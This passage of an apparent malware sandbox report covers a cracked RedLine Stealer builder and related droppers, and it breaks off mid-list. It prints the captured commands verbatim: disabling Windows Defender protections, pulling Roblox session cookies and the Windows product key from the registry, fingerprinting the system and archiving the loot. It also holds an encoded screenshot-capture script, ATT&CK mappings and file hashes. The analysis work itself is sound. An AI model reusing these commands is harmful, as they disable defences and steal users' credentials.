QAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5964
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fbfifa3g\fbfifa3g.cmdline"
        7⤵
        
        PID:5184
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES18A4.tmp" "c:\Users\Admin\AppData\Local\Temp\fbfifa3g\CSC3E3EFA2453034B358E85D2ECA7184722.TMP"
        8⤵
        
        PID:6012
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:6008
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5344
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5420
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5724
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5756
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5928
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5188
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:2164
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5300
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:2588
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1176"
        5⤵
        
        PID:5332
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1176
        6⤵
        Kills process with taskkill
        
        PID:5396
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4860"
        5⤵
        
        PID:5740
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4860
        6⤵
        Kills process with taskkill
        
        PID:5160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4788"
        5⤵
        
        PID:5888
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5928
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4788
        6⤵
        Kills process with taskkill
        
        PID:5996
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5008"
        5⤵
        
        PID:2164
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5008
        6⤵
        Kills process with taskkill
        
        PID:4652
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3736"
        5⤵
        
        PID:1180
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2588
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3736
        6⤵
        Kills process with taskkill
        
        PID:5296
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2388"
        5⤵
        
        PID:5376
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2388
        6⤵
        Kills process with taskkill
        
        PID:5288
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4580"
        5⤵
        
        PID:5628
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4580
        6⤵
        Kills process with taskkill
        
        PID:2284
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:5272
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5464
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:5144
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6068
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        5⤵
        
        PID:4816
      - C:\Windows\system32\getmac.exe
        
        getmac
        6⤵
        
        PID:6084
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19922\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\5eute.zip" *"
        5⤵
        
        PID:2780
      - C:\Users\Admin\AppData\Local\Temp\_MEI19922\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI19922\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\5eute.zip" *
        6⤵
        Executes dropped EXE
        
        PID:5524
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        5⤵
        
        PID:5428
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5332
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        6⤵
        
        PID:3552
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        5⤵
        
        PID:1092
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        6⤵
        
        PID:2256
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:5740
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5724
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:4828
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        5⤵
        
        PID:5416
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5996
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:5752
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:5684
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        5⤵
        
        PID:6052
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4200

C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\builder.exe
"C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\builder.exe"
1⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2004

C:\Users\Admin\Desktop\Build.exe
"C:\Users\Admin\Desktop\Build.exe"
1⤵
- Executes dropped EXE
PID:6060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Build.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1916
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:5840
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:5880
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:5612
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4732
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:1476

C:\Users\Admin\Downloads\B33uild.exe
"C:\Users\Admin\Downloads\B33uild.exe"
1⤵
- Executes dropped EXE
PID:1812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\B33uild.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5760
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5528
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:5996
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:5300
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:6100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4992
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:4732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
624B

MD5
f716d7b6755d9799d19e81824d3dfbcc

SHA1
9d70618a6dd493166b06f81c74be70cf0f5555f8

SHA256
d3f1800b3234fbeac2466cf2061866f258e82f5abd40e688b56b8975fa707a33

SHA512
23da659c62e1b509ece9a14537ada009af69cc8073d302975e040d72284a893d36cd49abd75bed8892edb9a09a9717c86d51059d3e9d8cba0bf6d13aedad8195

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\Paths\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
8191ed420fd52353debfe167c713b0d0

SHA1
b7816b5566eef6b7a19451724258ea3c5d7b8320

SHA256
65051ea6a3c69e5b8361e4607867068a369a72d1b1bb69f160909b7092fe05a7

SHA512
b5b2117c9ce7f98756dc38bc008111c6fb077fb8a11336c0ec9bf25154b310e424d8ca9b30fa7c2a9d1ec736b102246baf0e1a0355b141221ca9fcd6921ce9e9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
54be4dc403f311f1b02e973544a9b316

SHA1
f449e067e920bc121bb16c497831ab728dc7f360

SHA256
57424b0c2aeb6542a6733fcd4e96ced46795ad619401c71e0a397e2390ecac8e

SHA512
58318ac18087dcec15539d5d59fa41c7dcdf95d31f60d550f610f181ce62e821bf6f75263263ca379fb17ffe8db70da2506c21c0650c00bb17ff735d404ea6dc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
63d0210fbfb189d357c488af126f17e0

SHA1
99478355b9d13421a2cee28bdf87a6552d6edf7d

SHA256
6a9ce48743b5c9bf40829fd7b32137f7d93d7f000888edd3b522f199405d5aa3

SHA512
5301b6106365308e2bdc7e18da533ca3f56ba9f4ac32bdbaf5b9853cd14930fdf67d28f473da09d8c387651a512be7abdc1d8381617a0abffbe376617931053f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
130KB

MD5
fbe290e2bdd4a2b03c52fbb01ad23521

SHA1
2bfa5bec47863155cf765528fc4dc99461a45f20

SHA256
ed67d47a08c2b902a165b3e3b2b20752660b6e8273ac70ae2fcc01b4b4cddca7

SHA512
b7587e27d0b8b8ac4b7724938e9e4caa66d8f6da069959d4328b45cb42bf57b2872af227465b90f5d2ffdf19fb2be5347e65c3340d5cffd909870fbc8f14c307

Download Submit
C:\Users\Admin\AppData\Local\Temp\3c0McZMfYhZTE7f

Filesize
46KB

MD5
8f5942354d3809f865f9767eddf51314

SHA1
20be11c0d42fc0cef53931ea9152b55082d1a11e

SHA256
776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

SHA512
fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

Download Submit
C:\Users\Admin\AppData\Local\Temp\FifybfGDO8PfYFM

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\GERDA-Êðèïò â zip.exe

Filesize
7.5MB

MD5
2842b6eb83c0c1086f8e5f1cb7ac445a

SHA1
02683dfc3fb935c724624ebaae6daf5f27d19cd6

SHA256
07738a9f2d08827c8e5ca89dd2059f0c9dac2aca9cb40f76ab3bba4441eacc4e

SHA512
fd6fd924fab22026327962e9e1957b302487fc78ab09339077092257923928cd4b26dd4485b5d9846c0495daea660aee8bbb08c59400de341a0bbd8c60ba12c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\PJBmqYXhXbLxERr

Filesize
28KB

MD5
44d7f64c17cac46a94ff9315895e36e1

SHA1
f7cb0680e89f748096c970f21bd89084f3578779

SHA256
b30868eaa38fc344685a64b4d45acc989f9e6219b3367f9c416d6af6f2ef99c8

SHA512
479cd4df6ce9f5af1f4c88f00a9bd6e820ce56f24a080a80f5740fc9b4e10141ddf00320e2abef21685b788108d7647de33d13a1e7398ee17fc29ca41430c3ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe

Filesize
7.3MB

MD5
2bfedf6a805c0b09efcb38ff053e3e14

SHA1
c124c7b8be490c693a4a56bf8d28602036f3bd79

SHA256
12d66ea2bae0257a2d3fe98014b54c2f63199e6a4a4fae2d56e034761ee18999

SHA512
b1dab7364d22f5b20c0364f83071f3ed474a06388d7d896d5eafc6f6262d225a023c72262bae0281cc0cc32a2c6386b4bc13936bda9584623ab437807f7601a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RedLine.MainPanel-cracked.exe

Filesize
633KB

MD5
baf102927947289e4d589028620ce291

SHA1
5ade9a99a86e5558e5353afa7844229ed23bdcd5

SHA256
a6d2d1ba6765e5245b0f62e37d9298e20c913c5a33912b98bd65a76fc5ab28ae

SHA512
973ecb034ba18a74c85165df743d9d87168b07539c8ef1d60550171bc0a5766a10b9e6be1425aea203be45b4175694a489ea1b7837faa3b1927ca019492ccd37

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dnih2vsf.goi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gvowOaCdanmyEnT

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked.rar

Filesize
9.3MB

MD5
91c9fb11e1416d0d648628ec5026e132

SHA1
a29f4105d2cb1070dd1a4e6ae5f3e6e1a64bb011

SHA256
debd64db33a0cabd87b3869916023d982b5228bca6adfbb3e5e93b9b146a8f5a

SHA512
6abf14554e4c76dab4841d21c2bb0063393c900dbfa6dc191992e3398c9a177e4e2e7b68cbf73734c1b104a7e21abad652ed925230b388a400c43dd3a1294a50

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\Bunifu_UI_v1.52.dll

Filesize
219KB

MD5
5eca94d909f1ba4c5f3e35ac65a49076

SHA1
3b9cb69510887117844464a2cc711c06f2c3bd19

SHA256
de0e530d46c803d85b8aeb6d18816f1b09cb3dafefb5e19fdfa15c9f41e0f474

SHA512
257a33c748dfb617a7e2892310132fd4abf4384fb09c93a8ac3f609fd91353a4f3e326124ecc63b6041ac87cf4fcc17a8bdca312e0c851acd9c7a182247066ea

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\GuiLib.dll

Filesize
50KB

MD5
eaf9c55793cd26f133708714ed3a5397

SHA1
1818aa718498f0810199eca2b91db300dc24f902

SHA256
87cfc70bec2d2a37bcd5d46f9e6f0051f82e015ff96e8f2bc2d81b85f2632f15

SHA512
b793ae1155bd7be247b42c0fc1bc53e34cf69e802c0e365427322dac4b5cc68728d24255a717aaffa774b4551a6946c17106387cff4cfdb6ce638d8a4ecab4d9

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\MetroSet UI.dll

Filesize
436KB

MD5
f13dc3cffef729d26c4da102674561cf

SHA1
5f9abff0bdf305e33b578c22dada5c87b2f6f39c

SHA256
d490c04e6e89462fd46099d3454985f319f57032176c67403b3b92c86ca58bcb

SHA512
aa8699c5f608a10a577cb23715f761ee28922c4778f5ea8a5ec0a184e1143689fba5a08003fd5cbf3c7dd516eac1fddc8c3f9efa1d993ba1888e87b70190c08f

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\Mono.Cecil.Mdb.dll

Filesize
42KB

MD5
dc80f588f513d998a5df1ca415edb700

SHA1
e2f0032798129e461f0d2494ae14ea7a4f106467

SHA256
90cfc73befd43fc3fd876e23dcc3f5ce6e9d21d396bbb346513302e2215db8c9

SHA512
1b3e57fbc10f109a43e229b5010d348e2786e12ddf48a757da771c97508f8f3891be3118ff3bb84c3fd6bfa1723c670541667cdbf2d14ea63243f6def8f038cc

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\Mono.Cecil.Mdb.pdb

Filesize
18KB

MD5
0ba762b6b5fbda000e51d66722a3bb2c

SHA1
260f9c873831096e92128162cc4dfcc5c2ba9785

SHA256
d18eb89421d50f079291b78783408cee4bab6810e4c5a4b191849265bdd5ba7c

SHA512
03496dce05c0841888802005c75d5b94ac5ca3aa88d754230b6f4619861e58c0492c814805cde104dc7071e2860ebc90a7fba402c65a0397fb519c57fca982f7

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\Mono.Cecil.Pdb.dll

Filesize
87KB

MD5
6cd3ed3db95d4671b866411db4950853

SHA1
528b69c35a5e36cc8d747965c9e5ea0dc40323b8

SHA256
d67ebd49241041e6b6191703a90d89e68d4465adce02c595218b867df34581a3

SHA512
e8ae4caf214997cc440e684a963727934741fd616a073365fa1fc213c5ca336c12e117d7fa0d6643600a820297fc11a21e4ac3c11613fba612b90ebd5fc4c07e

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\Mono.Cecil.Pdb.pdb

Filesize
25KB

MD5
8e07476db3813903e596b669d3744855

SHA1
964a244772ee23c31f9e79477fbccfd8ed9437e6

SHA256
aa6469974d04cba872f86e6598771663bb8721d43a4a0a2a44cf3e2cd2f1e646

SHA512
715e7f4979142a96b04f8cb2ffa4a1547cd509eb05cf73f0885de533d60fd43d0c5bba9c051871fd38d503cb61fe1a0ee24350f25d89476fbc3b794f0ff9998f

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\Mono.Cecil.Rocks.dll

Filesize
27KB

MD5
c8f36848ce8f13084b355c934fc91746

SHA1
8f60c2fd1f6f5b5f365500b2749dca8c845f827a

SHA256
a08c040912df2a3c823ade85d62239d56abaa8f788a2684fb9d33961922687c7

SHA512
7c47f96e0e7dfaebb4dccf99fa0dda64c608634e2521798fd0d4c74eb2641c848fadad29c2cd26eb9b45acdfef791752959117a59e1f0913f9092e4662075115

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\Mono.Cecil.Rocks.pdb

Filesize
8KB

MD5
17e3ccb3a96be6d93ca3c286ca3b93dc

SHA1
d6e2f1edc52bbef4d6d2c63c837a024d6483bbb3

SHA256
ca54d2395697efc3163016bbc2bb1e91b13d454b9a5a3ee9a4304012f012e5eb

SHA512
08c4fc7b9a7609aca8d1f7c7cd1b8c859c198d3d4e7cad012a6f9b5490afff04a330c46f3429d61e3a5570c82855deda64a0308b899f8e2f93f66ed50f7fad3b

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\Mono.Cecil.dll

Filesize
337KB

MD5
7546acebc5a5213dee2a5ed18d7ebc6c

SHA1
b964d242c0778485322ccb3a3b7c25569c0718b7

SHA256
7744c9c84c28033bc3606f4dfce2adcd6f632e2be7827893c3e2257100f1cf9e

SHA512
30b3a001550dca88c8effc9e8107442560ee1f42e3d2f354cc2813ae9030bf872c76dc211fd12778385387be5937e9bf172ea00c151cab0bca77c8aafdd11f7d

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\Mono.Cecil.pdb

Filesize
172KB

MD5
c0a69f1b0c50d4f133cd0b278ac2a531

SHA1
bcefbe60c18318f21ba53377a386733e9266c37d

SHA256
a4f79c99d8923bd6c30efafa39363c18babe95f6609bbad242bca44342ccc7bb

SHA512
